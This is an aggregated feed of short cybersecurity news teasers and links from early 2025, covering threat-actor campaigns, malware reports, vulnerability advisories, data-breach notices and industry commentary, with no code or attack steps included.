Originally published by InsiderSecurity. Visibility into user actions is one of the critical challenges in the modern digital landscape. Traditional rule-based security solutions that generate a high number of alerts within modern environments are no longer practical; a new approach is needed. This is where User and Entity Behavior Analytics (UEBA) emerges as a critical security component, providing cybersecurity teams with visibility into user behaviors. Powered by technologies ...
https://cloudsecurityalliance.org/articles/understanding-ueba-essential-guide-to-user-and-entity-behavior-analytics-in-cybersecurity

Why GRC is key to safely unlocking ROI from design, hosting, and AI
Originally published by Scrut Automation. What's the one thing businesses want from their software investments? Quick results. According to G2's State of Software Report 2024, tools in design, hosting, and AI categories are leading the way in delivering faster ROI than any other software. And it's no surprise: these tools are designed to fuel creativity, streamline operations, and drive business impact at unprecedented speed. With Governance, Risk, and Compliance (GRC) ranking h...
https://cloudsecurityalliance.org/articles/why-grc-is-key-to-safely-unlocking-roi-from-design-hosting-and-ai

Ransom & Dark Web Issues Week 1, March 2025
ASEC Blog publishes Ransom & Dark Web Issues Week 1, March 2025.
SSH and DNS access rights of the world’s second-largest instant noodle brand company are being sold on BreachForums
Pro-Russian hacktivist SECT0R16 claims to have hacked the greenhouse environment control equipment system in Jeonju, South Korea
Ransomware group Fog […]
https://asec.ahnlab.com/en/86643/

Trends Report on Phishing Emails in February 2025
This report provides statistics, trends, and case details on the distribution volume and attachment threats of phishing emails collected and analyzed in February 2025. The following is a part of the statistics and cases included in the original report. 1. Phishing Email Threat Statistics: In February 2025, the most common type of threat among phishing […]
https://asec.ahnlab.com/en/86685/

Inside the Take Command Summit 2025 Agenda: What's in Store for This Year's Event?
Join Take Command 2025, a free virtual cybersecurity event on April 9. Hear from industry experts on AI-driven security, real-world attack simulations, and frontline SOC threat hunting strategies. Register now!
https://blog.rapid7.com/2025/03/05/inside-the-take-command-summit-2025-agenda-whats-in-store-for-this-years-event/

Organizations can shrink their attack surface by over 7,000 times
This week in cybersecurity from the editors at Cybercrime Magazine –Read the full story in Security InfoWatch Sausalito, Calif. – Mar. 5, 2025 “If Global Cybercrime Inc. traded on a stock exchange, I would buy it because its growth trajectory over the past decade has been breathtaking,” The post Organizations can shrink their attack surface by over 7,000 times appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/organizations-can-shrink-their-attack-surface-by-over-7000-times/

November 2024 Cyber Attacks Statistics
In November 2024, Cyber Crime continued to lead the Motivations chart with 72%, up from 68% of October. Operations driven...
https://www.hackmageddon.com/2025/03/05/november-2024-cyber-attacks-statistics/

Beneath the Surface: Detecting and Blocking Hidden Malicious Traffic Distribution Systems
A topological analysis and case studies add nuance to a study of malicious traffic distribution systems. We compare their use by attackers to benign systems. The post Beneath the Surface: Detecting and Blocking Hidden Malicious Traffic Distribution Systems appeared first on Unit 42.
https://unit42.paloaltonetworks.com/detect-block-malicious-traffic-distribution-systems/

Silk Typhoon targeting IT supply chain
Silk Typhoon is a Chinese state actor focused on espionage campaigns targeting a wide range of industries in the US and throughout the world. In recent months, Silk Typhoon has shifted to performing IT supply chain attacks to gain access to targets. In this blog, we provide an overview of the threat actor along with insight into their recent activity as well as their longstanding tactics, techniques, and procedures (TTPs), including a persistent interest in the exploitation of zero-day vulnerabilities in various public-facing appliances and moving from on-premises to cloud environments. The post Silk Typhoon targeting IT supply chain appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/

Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool
Attackers blackmail YouTubers with complaints and account blocking threats, forcing them to distribute a miner disguised as a bypass tool.
https://securelist.com/silentcryptominer-spreads-through-blackmail-on-youtube/115788/

New Auto-Color Linux Malware Targets Universities, Government Organizations
A new threat to Linux systems is active in the wild, targeting universities and government… New Auto-Color Linux Malware Targets Universities, Government Organizations on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/new-auto-color-linux-malware-targets-universities-government-organizations/

Microsoft Retires Skype, Asks Users To Switch To Teams Free
The popular chat app Skype's demise is now official. Microsoft recently asked all users to… Microsoft Retires Skype, Asks Users To Switch To Teams Free on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/microsoft-retires-skype-asks-users-to-switch-to-teams-free/

Thousands of Misconfigured AMS Risk Buildings' Security Globally
Researchers found thousands of misconfigured access management systems (AMS) exposing sensitive data online. These misconfigured… Thousands of Misconfigured AMS Risk Buildings' Security Globally on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/thousands-of-misconfigured-ams-risk-buildings-security-globally/

Meta Fired Employees For Alleged Information Leaks
After expressing concern for some time, Mark Zuckerberg, the brain behind Meta (formerly Facebook), showed… Meta Fired Employees For Alleged Information Leaks on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/meta-fired-employees-for-alleged-information-leaks/

Australia Bans Kaspersky Products From Government Systems
After other countries, Australia also steps in against Kaspersky, deeming it a security risk. In… Australia Bans Kaspersky Products From Government Systems on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/05/australia-bans-kaspersky-products-from-government-systems/

Implementing CCM: Cryptography, Encryption, and Key Management
The Cloud Controls Matrix (CCM) is a framework of controls (policies, procedures, and technical measures) that are essential for cloud computing security. It is created and updated by CSA and aligned to CSA best practices. You can use CCM to systematically assess and guide the security of any cloud implementation. CCM also provides guidance on which actors within the cloud supply chain should implement which security controls. Both cloud service customers (CSCs) and cloud service provide...
https://cloudsecurityalliance.org/articles/implementing-ccm-cryptography-encryption-and-key-management

Hitachi Vantara Pentaho BA Server Vulnerabilities
What is the Vulnerability? Threat actors are actively exploiting vulnerabilities in the Hitachi Vantara Pentaho Business Analytics Server. FortiGuard network sensors have detected attack attempts on over 500 devices, and CISA has added these vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation. The Pentaho Business Analytics Server is widely used, trusted by 73% of Fortune 100 companies, and plays a crucial role in data analysis and business intelligence.
Affected Vulnerabilities: CVE-2022-43939: Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability; CVE-2022-43769: Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability.
What is the recommended Mitigation? Apply the latest patch or update from the vendor. [CVE-2022-43769...
https://fortiguard.fortinet.com/threat-signal-report/6025

Your complete SaaS security guide—with best practices for ensuring it
Originally published by Vanta. SaaS security requires constantly monitoring and preparing to mitigate the latest industry threats and vulnerabilities. According to the 2024 State of SaaS Security Report, 58% of organizations experienced a SaaS security incident in the past year despite having high confidence levels in their existing security programs. Today, SaaS applications are among the most common targets of cyberattacks, which is why they require an elaborate, multi...
https://cloudsecurityalliance.org/articles/your-complete-saas-security-guide-with-best-practices-for-ensuring-it

What Comedy Can Tell Us About AI and Big Data
Originally published by CXO REvolutionaries. Written by Jay Patty, CTO in Residence, Zscaler. Knock, Knock. Who's there? Data. Data who? Data gonna help us stop the next cyber-attack, thanks to telemetry and analytics. Corny, right? Well, sometimes, the easiest way to unpack complexity is through humor. Think about it: what's funnier (or scarier) than watching John Oliver skewer data brokers or the runaway success of ransomware actors? In the same w...
https://cloudsecurityalliance.org/articles/what-comedy-can-tell-us-about-ai-and-big-data

The Questions Every Company Should Be Asking About AI
Originally published by Truyo. The trajectory of, and rapidly advancing regulatory landscape around, AI is reminiscent of privacy which, years ago, left companies scrambling to figure out what they needed to do, who is managing compliance, and what regulations they may be subject to, both existing and upcoming. As companies begin to navigate these uncharted waters, we've put together 4 questions every organization should be asking and answering to begin AI governance. 1. Do...
https://cloudsecurityalliance.org/articles/the-questions-every-company-should-be-asking-about-ai

Securing generative AI models on Azure AI Foundry
Discover how Microsoft secures AI models on Azure AI Foundry, ensuring robust security and trustworthy deployments for your AI systems. The post Securing generative AI models on Azure AI Foundry appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/03/04/securing-generative-ai-models-on-azure-ai-foundry/

Multiple Zero-Day Vulnerabilities in Broadcom VMware ESXi and Other Products
On Tuesday, March 4, 2025, Broadcom published a critical security advisory (VMSA-2025-0004) on 3 new zero-day vulnerabilities affecting multiple VMware products, including ESXi, Workstation, and Fusion.
https://blog.rapid7.com/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/

New AI-Powered Scam Detection Features to Help Protect You on Android
Posted by Lyubov Farafonova, Product Manager, Phone by Google; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse. Google has been at the forefront of protecting users from the ever-growing threat of scams and fraud with cutting-edge technologies and security expertise for years. In 2024, scammers used increasingly sophisticated tactics and generative AI-powered tools to steal more than trillion from mobile consumers globally, according to the Global Anti-Scam Alliance. And with the majority of scams now delivered through phone calls and text messages, we've been focused on making Android's safeguards even more intelligent with powerful Google AI to help keep your financial information and data safe. Today, we're launching two new industry-leading...
http://security.googleblog.com/2025/03/new-ai-powered-scam-detection-features.html

Hunters Announces New AI Capabilities with Pathfinder AI for Smarter SOC Automation
Boston and Tel Aviv, United States, 4th March 2025, CyberNewsWire. Hunters Announces New AI Capabilities with Pathfinder AI for Smarter SOC Automation on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/03/04/hunters-announces-new-ai-capabilities-with-pathfinder-ai-for-smarter-soc-automation/

The hidden threat: Tackling malware in your software supply chain
The value of open source is undeniable — 90% of all modern software development depends on it. According to Harvard Business School, in 2024 alone, more than 6 trillion open source software components were downloaded, representing almost trillion in value to users.
https://www.sonatype.com/blog/the-hidden-threat-tackling-malware-in-your-software-supply-chain

Analysis of Lazarus Group's Attack on Windows Web Servers
AhnLab SEcurity intelligence Center (ASEC) has identified attack cases of the Lazarus group breaching a normal server and using it as a C2. Attacks that install a web shell and C2 script on South Korean web servers continue to occur. Additionally, there are cases where LazarLoader malware and privilege escalation tools are identified. 1. […]
https://asec.ahnlab.com/en/86687/

Weekly Detection Rule (YARA and Snort) Information – Week 1, March 2025
The following is the information on Yara and Snort rules (week 1, March 2025) collected and shared by the AhnLab TIP service.
YARA Rules (1) – Detection name: sig_27244_metasploit_hta_stager; Description: file UsySLX1n.hta; Source: https://github.com/The-DFIR-Report/Yara-Rules
Snort Rules (23) – Detection name: ET WEB_SPECIFIC_APPS Paessler PRTG Notification Command Injection Attempt (CVE-2018-9276); Source: https://rules.emergingthreatspro.com/open/ – Detection name: ET EXPLOIT Exim SQLite (DBM) Injection […]
https://asec.ahnlab.com/en/86614/

Building a High Performance Team in India: Meet Swami Nathan
Swami Nathan has a track record of building new teams from scratch for global companies. Through his experiences, he's identified what it takes to build not just any team, but a high performing team that drives innovation for business while propelling career trajectories for those who take the ride.
https://blog.rapid7.com/2025/03/04/building-a-high-performance-team-in-india-meet-swami-nathan/

The Case for More Women in Cybersecurity
This week in cybersecurity from the editors at Cybercrime Magazine. Read the full story in CFOtech. Sausalito, Calif. – Mar. 4, 2025. Cybersecurity is evolving rapidly, and so is the need for diverse perspectives. By 2031, women are expected to hold 35 percent of cybersecurity jobs. The post The Case for More Women in Cybersecurity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-case-for-more-women-in-cybersecurity/

A.I in Cybersecurity: Revolutionizing Threat Detection and Response
Written by Abel E. Molina, Cybersecurity Architect, Softchoice. “There's nothing to fear, than fear itself” – T. Roosevelt. How Artificial Intelligence is Reshaping Security Measures: In an era where cyber threats are becoming increasingly sophisticated, the need for advanced security measures has never been more critical. Enter artificial intelligence (AI) – a game-changer in the realm of cybersecurity. AI is revolutionizing how we detect and respond to threats, enhanci...
https://cloudsecurityalliance.org/articles/a-i-in-cybersecurity-revolutionizing-threat-detection-and-response

AI Agents: Human or Non-Human?
Originally published by Oasis Security. Written by Marta Dern. During CES 2025, Jensen Huang (CEO of NVIDIA) stated in his keynote: ... In the future these AI agents are essentially digital workforce that are working alongside your employees doing things for you on your behalf, and so the way that you would bring these special agents into your company is to onboard them just like you onboard an employee. This vision raises a fundamental question for Identity S...
https://cloudsecurityalliance.org/articles/ai-agents-human-or-non-human

What Is Credential Management? Best Practices and Examples
Strong credentials safeguard your digital resources, but common mistakes like weak passwords, credential reuse, and exposed secrets give attackers an easy path to unauthorized access.
https://www.legitsecurity.com/blog/credential-management

What Is Code Scanning? Approaches and Best Practices
Identifying security flaws early in the software development lifecycle (SDLC) prevents vulnerabilities from reaching production, where they become more complex and expensive to fix. Integrating automated code scanning into development workflows allows you to catch issues as they arise, providing a more secure and stable codebase.
https://www.legitsecurity.com/blog/code-scanning-best-practices

6 Effective Secret Scanning Tools
Secret scanning tools identify and protect sensitive information that may be exposed within software assets. Developers often embed secrets like API keys, database credentials, and encryption keys in source code—but if left unprotected, these can serve as direct entry points for attackers. 
https://www.legitsecurity.com/blog/secret-scanning-tools

Video Report: Women Hold 30 Percent Of Jobs In Cybersecurity
This week in cybersecurity from the editors at Cybercrime Magazine. Watch the YouTube Video. Sausalito, Calif. – Mar. 3, 2025. Cybersecurity Ventures predicts that women will represent 30 percent of the global cybersecurity workforce by the end of 2025, increasing to 35 percent by 2031. Women The post Video Report: Women Hold 30 Percent Of Jobs In Cybersecurity appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/video-report-women-hold-30-percent-of-jobs-in-cybersecurity/

Uncovering .NET Malware Obfuscated by Encryption and Virtualization
Malware authors use AES encryption and code virtualization to evade sandbox static analysis. We explore how this facilitates spread of Agent Tesla, XWorm and more. The post Uncovering .NET Malware Obfuscated by Encryption and Virtualization appeared first on Unit 42.
https://unit42.paloaltonetworks.com/malware-obfuscation-techniques/

Mobile malware evolution in 2024
The most notable mobile threats of 2024, and statistics on Android-specific malware, adware and potentially unwanted software.
https://securelist.com/mobile-threat-report-2024/115494/

Color Dating - 220,503 breached accounts
In September 2018, the dating app to match people with different ethnicities Color Dating suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed 220k unique email addresses along with bios, names, profile photos and bcrypt password hashes. The data was provided to HIBP by a source who requested it be attributed to "ANK (Veles)".
https://haveibeenpwned.com/PwnedWebsites#ColorDating

Flat Earth Sun, Moon and Zodiac App - 33,294 breached accounts
In October 2024, the flat earth sun, moon and zodiac app created by Flat Earth Dave was found to be leaking extensive personal information of its users. The data included 33k unique email addresses along with usernames, latitudes and longitudes (their position on the globe) and passwords stored in plain text. A small number of profiles also contained names, dates of birth and genders.
https://haveibeenpwned.com/PwnedWebsites#FlatEarthDave

Palo Alto PAN-OS Authentication Bypass
What is the Vulnerability? A recent authentication bypass vulnerability (CVE-2025-0108) in the Palo Alto Networks PAN-OS software is under active exploitation and has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog. Successful exploitation of CVE-2025-0108 enables an unauthenticated attacker with network access to the management web interface to bypass the authentication required by the PAN-OS management web interface and invoke certain PHP scripts that can impact its integrity and confidentiality. According to the vendor advisory, Palo Alto Networks has observed exploit attempts chaining CVE-2025-0108 with CVE-2024-9474 and CVE-2025-0111 on unpatched and unsecured PAN-OS web management interfaces. A detailed Outbreak report including the attack using CVE-2024-9474 was released...
https://fortiguard.fortinet.com/threat-signal-report/6019

Notorious Malware, Spam Host “Prospero” Moves to Kaspersky Lab
One of the most notorious providers of abuse-friendly "bulletproof" web hosting for cybercriminals has started routing its operations through networks run by the Russian antivirus and security firm Kaspersky Lab, KrebsOnSecurity has learned.
https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab/

Enhancing Cybersecurity with RSM: A Deep Dive into Managed Security Services
Expert Insights on the Role of AI and Automation in Enhancing Cybersecurity Resiliency – Vlad Babiuk, Director of Competitive Technical Product Marketing. San Jose, Calif. – Feb. 28, 2025. Resiliency is an increasingly important concept in cybersecurity. Vendors are increasingly using AI and automation to The post Enhancing Cybersecurity with RSM: A Deep Dive into Managed Security Services appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/enhancing-cybersecurity-with-rsm-a-deep-dive-into-managed-security-services/

Metasploit Weekly Wrap-Up: 02/28/2025
This week's Metasploit Weekly Wrap-Up saw 5 new modules. One module adds credential harvesting for MySCADA MyPro Manager using CVE-2025-24865 & CVE-2025-22896.
https://blog.rapid7.com/2025/02/28/metasploit-weekly-wrap-up-02-28-2025/

JavaGhost's Persistent Phishing Attacks From the Cloud
Unit 42 reports on phishing activity linked to the threat group JavaGhost. These attacks target organizations' AWS environments. The post JavaGhost's Persistent Phishing Attacks From the Cloud appeared first on Unit 42.
https://unit42.paloaltonetworks.com/javaghost-cloud-phishing/

The SOC files: Chasing the web shell
Kaspersky SOC analysts discuss a recent incident where the well-known Behinder web shell was used as a post-exploitation backdoor, showing how web shells have evolved.
https://securelist.com/soc-files-web-shell-chase/115714/

Spyzie - 518,643 breached accounts
In February 2025, the spyware service Spyzie suffered a data breach along with sibling spyware services, Spyic and Cocospy. The Spyzie breach alone exposed almost 519k customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Spyzie

Why MDR In 2025 Is About Scaling With Purpose
Forrester recently released “The Forrester Wave™: Managed Detection and Response (MDR) Services, Q1 2025,” highlighting the top 10 MDR providers out of more than 600 worldwide.
https://blog.rapid7.com/2025/02/27/why-mdr-in-2025-is-about-scaling-with-purpose/

The 2025 State of Application Risk Report: Understanding Toxic Combinations in Application Security
Get details on the most common toxic combinations Legit unearthed in enterprises' software factories.
https://www.legitsecurity.com/blog/understanding-toxic-combinations-in-application-security

16-30 November 2024 Cyber Attacks Timeline
In the second timeline of November 2024 I collected 117 events (7.8 events/day) with a threat landscape dominated by malware
https://www.hackmageddon.com/2025/02/27/16-30-november-2024-cyber-attacks-timeline/

Squidoor: Suspected Chinese Threat Actor's Backdoor Targets Global Organizations
We analyze the backdoor Squidoor, used by a suspected Chinese threat actor to steal sensitive information. This multi-platform backdoor is built for stealth. The post Squidoor: Suspected Chinese Threat Actor's Backdoor Targets Global Organizations appeared first on Unit 42.
https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/

Orange Romania - 556,557 breached accounts
In February 2025, the Romanian arm of telecommunications company Orange suffered a data breach which was subsequently published to a popular hacking forum. The data included 556k email addresses (of which hundreds of thousands were in the form of [phone number]@as1.romtelecom.net), phone numbers, subscription details, partial credit card data (type, last 4 digits, expiration date and issuing bank). The breach also exposed an extensive number of internal documents.
https://haveibeenpwned.com/PwnedWebsites#OrangeRomania

U.S. Soldier Charged in AT&T Hack Searched “Can Hacking Be Treason”
A U.S. Army soldier who pleaded guilty last week to leaking phone records for high-ranking U.S. government officials searched online for non-extradition countries and for an answer to the question "can hacking be treason?" prosecutors in the case said Wednesday. The government disclosed the details in a court motion to keep the defendant in custody until he is discharged from the military.
https://krebsonsecurity.com/2025/02/u-s-soldier-charged-in-att-hack-searched-can-hacking-be-treason/

Fake IP checker utilities on npm are crypto stealers
Recently identified npm packages called "node-request-ip", "request-ip-check" and "request-ip-validator" impersonate handy open source utilities relied upon by developers to retrieve an external IP address but instead target Windows, Linux and macOS users with malicious executables which are trojans and cryptocurrency stealers.
https://www.sonatype.com/blog/fake-ip-checker-utilities-on-npm-are-crypto-stealers

Rethinking remote assistance security in a Zero Trust world
The rise in sophisticated cyberthreats demands a fundamental shift in our approach. Organizations must rethink remote assistance security through the lens of Zero Trust, using the three key principles of Verify Explicitly, Use Least Privilege, and Assume Breach as a guide and ensuring that every session, user, and device is verified, compliant, and monitored before access is granted. The post Rethinking remote assistance security in a Zero Trust world appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/02/26/rethinking-remote-assistance-security-in-a-zero-trust-world/

Why AI Can't Replace Cybersecurity Analysts
As we face an extreme downturn in cybersecurity hiring which entry level candidates bear the brunt of, I want to address an elephant in the room: AI. I spend a lot of my time providing career clinics and mentorship, and I truly understand this is one of the worst cybersecurity job markets for young people […]
https://tisiphone.net/2025/02/26/why-ai-cant-replace-cybersecurity-analysts/

The Phillip Wylie Show!
I made an appearance on the wonderful Phillip Wylie show! It was incredibly kind of him to have me on. We talked about a kind of niche area of ICS – how to do digital forensics in that space – especially weird and legacy stuff – and what that actually means during incident response. Check […]
https://tisiphone.net/2025/02/26/the-phillip-wylie-show/

Building a security-minded development team: DevSecOps tools and SDLC best practices
In an increasingly adversarial threat landscape, software security can't be just one more checkpoint on the road to your next release. It should be integral to how every member of your development team works, from developers and DevOps professionals to quality assurance testers and project managers. As your organization faces increasingly sophisticated threats, a security-minded development team has evolved from a "nice-to-have" into a business imperative.
https://www.sonatype.com/blog/building-a-security-minded-development-team-devsecops-tools-and-sdlc-best-practices

Celebrating 1 Year of CSF 2.0
It has been one year since the release of the NIST Cybersecurity Framework (CSF) 2.0! To make improving your security posture even easier, in this blog we are: Sharing new CSF 2.0 resources; Taking a retrospective look at some resources and applications you may have missed; and Highlighting ways you can stay involved in our work, helping us help you implement better cybersecurity. NIST's subject matter experts have worked over the last year to continue expanding the CSF 2.0 implementation resources to help you secure your enterprise. Stakeholders are a very important force behind NIST's
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-1-year-csf-20

RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector
Koi Stealer and RustDoor malware were used in a campaign linked to North Korea. This activity targeted crypto wallet owners. The post RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector appeared first on Unit 42.
https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/

Exploits and vulnerabilities in Q4 2024
This report provides statistics on vulnerabilities and exploits and discusses the most frequently exploited vulnerabilities in Q4 2024.
https://securelist.com/vulnerabilities-and-exploits-in-q4-2024/115761/

Google Announces Quantum-Safe Digital Signatures For Cloud KMS
Google has announced that it is integrating quantum resistance into its cloud security structure. As… Google Announces Quantum-Safe Digital Signatures For Cloud KMS on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/02/26/google-announces-quantum-safe-digital-signatures-for-cloud-kms/

Securing tomorrow's software: the need for memory safety standards
Posted by Alex Rebert, Security Foundations, Ben Laurie, Research, Murali Vijayaraghavan, Research and Alex Richardson, Silicon. For decades, memory safety vulnerabilities have been at the center of various security incidents across the industry, eroding trust in technology and costing billions. Traditional approaches, like code auditing, fuzzing, and exploit mitigations – while helpful – haven't been enough to stem the tide, while incurring an increasingly high cost. In this blog post, we are calling for a fundamental shift: a collective commitment to finally eliminate this class of vulnerabilities, anchored on secure-by-design practices – not just for ourselves but for the generations that follow. The shift we are calling for is reinforced by a recent ACM article calling to standardize...
http://security.googleblog.com/2025/02/securing-tomorrows-software-need-for.html

ALIEN TXTBASE Stealer Logs - 284,132,969 breached accounts
In February 2025, 23 billion rows of stealer logs were obtained from a Telegram channel known as ALIEN TXTBASE. The data contained 284M unique email addresses alongside the websites they were entered into and the passwords used. This data is now searchable in HIBP by both email domain and the domain of the target website.
https://haveibeenpwned.com/PwnedWebsites#AlienStealerLogs

Behind the Baseline: Reflecting on the launch of the Open Source Project Security Baseline
It's been a while since I've shared an update on the work Sonatype is doing in the open source ecosystem, so I'm excited to share an update on a few things we're doing in the space — and how it led to the creation of a new security standard in the Open Source Security Foundation (OpenSSF).
https://www.sonatype.com/blog/behind-the-baseline-reflecting-on-the-launch-of-the-open-source-project-security-baseline

Passkeys
Don't we all know the hassle of managing loads of passwords, trying to come up with secure and unique ones only to try afterwards to remember them? Or always staying on high alert whether the URL is definitely the valid one for the website we are trying to visit? What if all this could be over soon? Welcome to Passkeys!
https://blog.compass-security.com/2025/02/passkeys/

Auto-Color: An Emerging and Evasive Linux Backdoor
The new Linux malware named Auto-Color uses advanced evasion tactics. Discovered by Unit 42, this article covers its installation, evasion features and more. The post Auto-Color: An Emerging and Evasive Linux Backdoor appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/

PirateFi Game Infected Steam Users' Devices With Malware
Steam users must scan their systems for possible malware infection as the service warns users… PirateFi Game Infected Steam Users' Devices With Malware on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/02/24/piratefi-game-infected-steam-users-devices-with-malware/

The GitVenom campaign: cryptocurrency theft using GitHub
Kaspersky researchers discovered GitVenom campaign distributing stealers and open-source backdoors via fake GitHub projects.
https://securelist.com/gitvenom-campaign/115694/

Trump 2.0 Brings Cuts to Cyber, Consumer Protections
One month into his second term, President Trump's actions to shrink the government through mass layoffs, firings and withholding funds allocated by Congress have thrown federal cybersecurity and consumer protection programs into disarray. At the same time, agencies are battling an ongoing effort by the world's richest man to wrest control over their networks and data.
https://krebsonsecurity.com/2025/02/trump-2-0-brings-cuts-to-cyber-consumer-protections/

Rust rising: Navigating the ecosystem and adoption challenges
Rust continues to gain traction as a powerful programming language, balancing high performance with memory safety.
https://www.sonatype.com/blog/rust-rising-navigating-the-ecosystem-and-adoption-challenges

Investigating LLM Jailbreaking of Popular Generative AI Web Products
We discuss vulnerabilities in popular GenAI web products to LLM jailbreaks. Single-turn strategies remain effective, but multi-turn approaches show greater success. The post Investigating LLM Jailbreaking of Popular Generative AI Web Products appeared first on Unit 42.
https://unit42.paloaltonetworks.com/jailbreaking-generative-ai-web-products/

Spyic - 875,999 breached accounts
In February 2025, the spyware service Spyic suffered a data breach along with sibling spyware service, Cocospy. The Spyic breach alone exposed almost 876k customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Spyic

Cocospy - 1,798,059 breached accounts
In February 2025, the spyware service Cocospy suffered a data breach along with sibling spyware service, Spyic. The Cocospy breach alone exposed almost 1.8M customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Cocospy

Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview
Connect with Microsoft at Legalweek 2025 to learn how to embrace AI while protecting your organization's data with Microsoft Purview. The post Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/02/20/microsoft-at-legalweek-help-safeguard-your-ai-future-with-microsoft-purview/

AI impact on the future of automation and ethics: Insights from Gartner® report
Artificial intelligence (AI) is no longer just a tool for efficiency — it is shaping the very fabric of business operations, decision-making, and human interaction. As AI permeates every aspect of technology, the impact of AI extends beyond innovation to include automation, human augmentation, and new ethical challenges.
https://www.sonatype.com/blog/ai-impact-on-the-future-of-automation-and-ethics-insights-from-gartner-report

Fake job offers target software developers with infostealers
A North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers
https://www.welivesecurity.com/en/videos/fake-job-offers-target-coders-infostealers/

Stately Taurus Activity in Southeast Asia Links to Bookworm Malware
Unit 42 details the just-discovered connection between threat group Stately Taurus (aka Mustang Panda) and the malware Bookworm, found during analysis of the group's infrastructure. The post Stately Taurus Activity in Southeast Asia Links to Bookworm Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/

DeceptiveDevelopment targets freelance developers
ESET researchers analyzed a campaign delivering malware bundled with job interview challenges
https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/

Last chance for online career mentorship, for a while
As I turn my attention to the major life change of moving to Australia, this will be the last opportunity to take advantage of my free, weekly cybersecurity career mentorship sessions for the indefinite future. I’ve really enjoyed providing this service on top of my normal career clinics at conferences, and I hope I can […]
https://tisiphone.net/2025/02/19/last-chance-for-online-career-mentorship-for-a-while/

Podcast: Expanding Frontiers Research
In this podcast, I’m asked about current and future trends in industrial cyberattacks, as well as a variety of community and social issues facing our industry in the future.
https://tisiphone.net/2025/02/19/podcast-expanding-frontiers-research/

Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms
We are excited to announce that Gartner has named Microsoft a Leader in the 2024 Gartner® Magic Quadrant™ for Cyber Physical Systems Protection Platforms. Gartner defines cyber-physical systems (CPS) as "engineered systems that orchestrate sensing, computation, control, networking and analytics" that connect the digital and physical worlds. They span industrial control systems (ICS), OT devices, Internet of Things (IoT) devices, and more. The post Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/02/19/microsoft-is-named-a-leader-in-the-2025-gartner-magic-quadrant-for-cyber-physical-systems-protection-platforms/

Securing multi-environment deployments: Cloud, on-premise, and air-gapped
Modern software delivery makes use of many different deployment environments, from public cloud to private cloud and traditional on-premise data centers to highly secured air-gapped systems. Organizations take advantage of multiple deployment models to meet cost optimization, regulatory compliance, and operational flexibility objectives.
https://www.sonatype.com/blog/securing-multi-environment-deployments-cloud-on-premise-and-air-gapped

INE Security's Cybersecurity and IT Training Enhances Career Stability in Tech
Cary, North Carolina, 19th February 2025, CyberNewsWire INE Security’s Cybersecurity and IT Training Enhances Career Stability in Tech on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/02/19/ine-securitys-cybersecurity-and-it-training-enhances-career-stability-in-tech/

Proofpoint ranked #1 in Four out of Five Use Cases in the 2025 Gartner® Critical Capabilities™ Report for Email Security Platforms

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-ranked-1-four-out-five-use-cases-2025-gartnerr-critical

